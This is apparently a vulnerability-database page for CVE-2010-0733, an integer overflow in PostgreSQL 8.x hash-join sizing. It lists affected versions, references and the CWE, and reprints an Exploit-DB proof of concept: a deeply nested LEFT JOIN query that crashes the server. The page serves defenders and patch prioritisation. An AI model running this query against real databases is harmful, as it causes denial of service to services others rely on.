CVE-2010-0733
Description
Integer overflow in src/backend/executor/nodeHash.c in PostgreSQL 8.4.1 and earlier, and 8.5 through 8.5alpha2, allows remote authenticated users to cause a denial of service (daemon crash) via a SELECT statement with many LEFT JOIN clauses, related to certain hashtable size calculations.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
PostgreSQL 8.4.1 - JOIN Hashtable Size Integer Overflow Denial of Service
source: https://www.securityfocus.com/bid/38619/info
PostgreSQL is prone to a remote denial-of-service vulnerability because it fails to properly validate user-supplied data before using it in memory-allocation calculations.
An attacker can exploit this issue to cause the affected application to crash. Due to the nature of this issue, remote code execution may be possible; this has not been confirmed.
```sql
SELECT * from B AS alias0 LEFT JOIN BB AS alias1 LEFT JOIN B
AS alias2 LEFT JOIN A AS alias3 LEFT JOIN AA AS alias4 LEFT JOIN B
AS alias5 ON alias4.int_key = alias5.int_key ON alias3.int_key =
alias4.int_key LEFT JOIN AA AS alias6 LEFT JOIN A AS alias7 ON
alias6.int_key = alias7.int_key LEFT JOIN BB AS alias8 ON alias7.int_key
= alias8.int_key ON alias3.int_key = alias8.int_key LEFT JOIN AA AS
alias9 ON alias6.int_key = alias9.int_key ON alias2.int_key =
alias8.int_key LEFT JOIN BB AS alias10 LEFT JOIN AA AS alias11 LEFT
JOIN B AS alias12 ON alias11.int_key = alias12.int_key ON alias10.int_key
= alias11.int_key ON alias9.int_key = alias10.int_key ON alias1.int_key =
alias8.int_key LEFT JOIN BB AS alias13 LEFT JOIN A AS alias14
LEFT JOIN AA AS alias15 LEFT JOIN A AS alias16 ON alias15.int_key =
alias16.int_key LEFT JOIN B AS alias17 ON alias15.int_key =
alias17.int_key ON alias14.int_key = alias16.int_key LEFT JOIN AA AS
alias18 ON alias14.int_key = alias18.int_key LEFT JOIN B AS alias19 ON
alias15.int_key = alias19.int_key LEFT JOIN AA AS alias20 ON
alias16.int_key = alias20.int_key ON alias13.int_key = alias19.int_key
LEFT JOIN A AS alias21 ON alias13.int_key = alias21.int_key ON
alias3.int_key = alias17.int_key LEFT JOIN B AS alias22 ON alias7.int_key
= alias22.int_key LEFT JOIN A AS alias23 ON alias20.int_key =
alias23.int_key LEFT JOIN A AS alias24 ON alias14.int_key =
alias24.int_key LEFT JOIN BB AS alias25 LEFT JOIN BB AS alias26 ON
alias25.int_key = alias26.int_key LEFT JOIN A AS alias27 LEFT JOIN
A AS alias28 ON alias27.int_key = alias28.int_key LEFT JOIN B AS alias29
LEFT JOIN BB AS alias30 LEFT JOIN B AS alias31 LEFT JOIN A AS
alias32 LEFT JOIN B AS alias33 ON alias32.int_key = alias33.int_key LEFT
JOIN A AS alias34 ON alias32.int_key = alias34.int_key ON alias31.int_key
= alias33.int_key ON alias30.int_key = alias33.int_key ON alias29.int_key
= alias34.int_key ON alias27.int_key = alias34.int_key LEFT JOIN AA AS
alias35 LEFT JOIN A AS alias36 ON alias35.int_key = alias36.int_key ON
alias34.int_key = alias36.int_key LEFT JOIN A AS alias37 ON
alias33.int_key = alias37.int_key ON alias25.int_key = alias32.int_key
LEFT JOIN A AS alias38 ON alias37.int_key = alias38.int_key ON
alias15.int_key = alias37.int_key ON alias0.int_key = alias9.int_key
```
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| postgresql | postgresql | up to and including 8.4.1 | |
| postgresql | postgresql | 8.0 | |
| postgresql | postgresql | 8.0.0 | |
| postgresql | postgresql | 8.0.1 | |
| postgresql | postgresql | 8.0.2 | |
| postgresql | postgresql | 8.0.3 | |
| postgresql | postgresql | 8.0.4 | |
| postgresql | postgresql | 8.0.5 | |
| postgresql | postgresql | 8.0.6 | |
| postgresql | postgresql | 8.0.7 | |
| postgresql | postgresql | 8.0.8 | |
| postgresql | postgresql | 8.0.9 | |
| postgresql | postgresql | 8.0.10 | |
| postgresql | postgresql | 8.0.11 | |
| postgresql | postgresql | 8.0.12 | |
| postgresql | postgresql | 8.0.13 | |
| postgresql | postgresql | 8.0.14 | |
| postgresql | postgresql | 8.0.15 | |
| postgresql | postgresql | 8.0.16 | |
| postgresql | postgresql | 8.0.17 | |
| postgresql | postgresql | 8.0.18 | |
| postgresql | postgresql | 8.0.19 | |
| postgresql | postgresql | 8.0.20 | |
| postgresql | postgresql | 8.0.21 | |
| postgresql | postgresql | 8.0.22 | |
| postgresql | postgresql | 8.0.23 | |
| postgresql | postgresql | 8.0.24 | |
| postgresql | postgresql | 8.0.317 | |
| postgresql | postgresql | 8.1 | |
| postgresql | postgresql | 8.1.0 | |
| postgresql | postgresql | 8.1.1 | |
| postgresql | postgresql | 8.1.2 | |
| postgresql | postgresql | 8.1.3 | |
| postgresql | postgresql | 8.1.4 | |
| postgresql | postgresql | 8.1.5 | |
| postgresql | postgresql | 8.1.6 | |
| postgresql | postgresql | 8.1.7 | |
| postgresql | postgresql | 8.1.8 | |
| postgresql | postgresql | 8.1.9 | |
| postgresql | postgresql | 8.1.10 | |
| postgresql | postgresql | 8.1.11 | |
| postgresql | postgresql | 8.1.12 | |
| postgresql | postgresql | 8.1.13 | |
| postgresql | postgresql | 8.1.14 | |
| postgresql | postgresql | 8.1.15 | |
| postgresql | postgresql | 8.1.16 | |
| postgresql | postgresql | 8.1.17 | |
| postgresql | postgresql | 8.1.18 | |
| postgresql | postgresql | 8.1.19 | |
| postgresql | postgresql | 8.1.20 | |
| postgresql | postgresql | 8.2 | |
| postgresql | postgresql | 8.2.1 | |
| postgresql | postgresql | 8.2.2 | |
| postgresql | postgresql | 8.2.3 | |
| postgresql | postgresql | 8.2.4 | |
| postgresql | postgresql | 8.2.5 | |
| postgresql | postgresql | 8.2.6 | |
| postgresql | postgresql | 8.2.7 | |
| postgresql | postgresql | 8.2.8 | |
| postgresql | postgresql | 8.2.9 | |
| postgresql | postgresql | 8.2.10 | |
| postgresql | postgresql | 8.2.11 | |
| postgresql | postgresql | 8.2.12 | |
| postgresql | postgresql | 8.2.13 | |
| postgresql | postgresql | 8.2.14 | |
| postgresql | postgresql | 8.2.15 | |
| postgresql | postgresql | 8.2.16 | |
| postgresql | postgresql | 8.3 | |
| postgresql | postgresql | 8.3.1 | |
| postgresql | postgresql | 8.3.2 | |
| postgresql | postgresql | 8.3.3 | |
| postgresql | postgresql | 8.3.4 | |
| postgresql | postgresql | 8.3.5 | |
| postgresql | postgresql | 8.3.6 | |
| postgresql | postgresql | 8.3.7 | |
| postgresql | postgresql | 8.3.8 | |
| postgresql | postgresql | 8.3.9 | |
| postgresql | postgresql | 8.3.10 | |
| postgresql | postgresql | 8.4 | |
| postgresql | postgresql | 8.5 | |
References
- http://archives.postgresql.org/pgsql-bugs/2009-10/msg00277.php
- http://archives.postgresql.org/pgsql-bugs/2009-10/msg00287.php
- http://archives.postgresql.org/pgsql-bugs/2009-10/msg00289.php
- http://archives.postgresql.org/pgsql-bugs/2009-10/msg00310.php
- http://git.postgresql.org/gitweb?p=postgresql.git%3Ba=commit%3Bh=64b057e6823655fb6c5d1f24a28f236b94dd6c54
- http://lists.opensuse.org/opensuse-security-announce/2010-08/msg00001.html
- http://secunia.com/advisories/39820
- http://www.openwall.com/lists/oss-security/2010/03/09/2
- http://www.openwall.com/lists/oss-security/2010/03/16/10
- http://www.redhat.com/support/errata/RHSA-2010-0427.html
- http://www.redhat.com/support/errata/RHSA-2010-0428.html
- http://www.redhat.com/support/errata/RHSA-2010-0429.html
- http://www.securityfocus.com/bid/38619
- http://www.vupen.com/english/advisories/2010/1197
- https://bugzilla.redhat.com/show_bug.cgi?id=546621
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10691
CWEs
CWE-189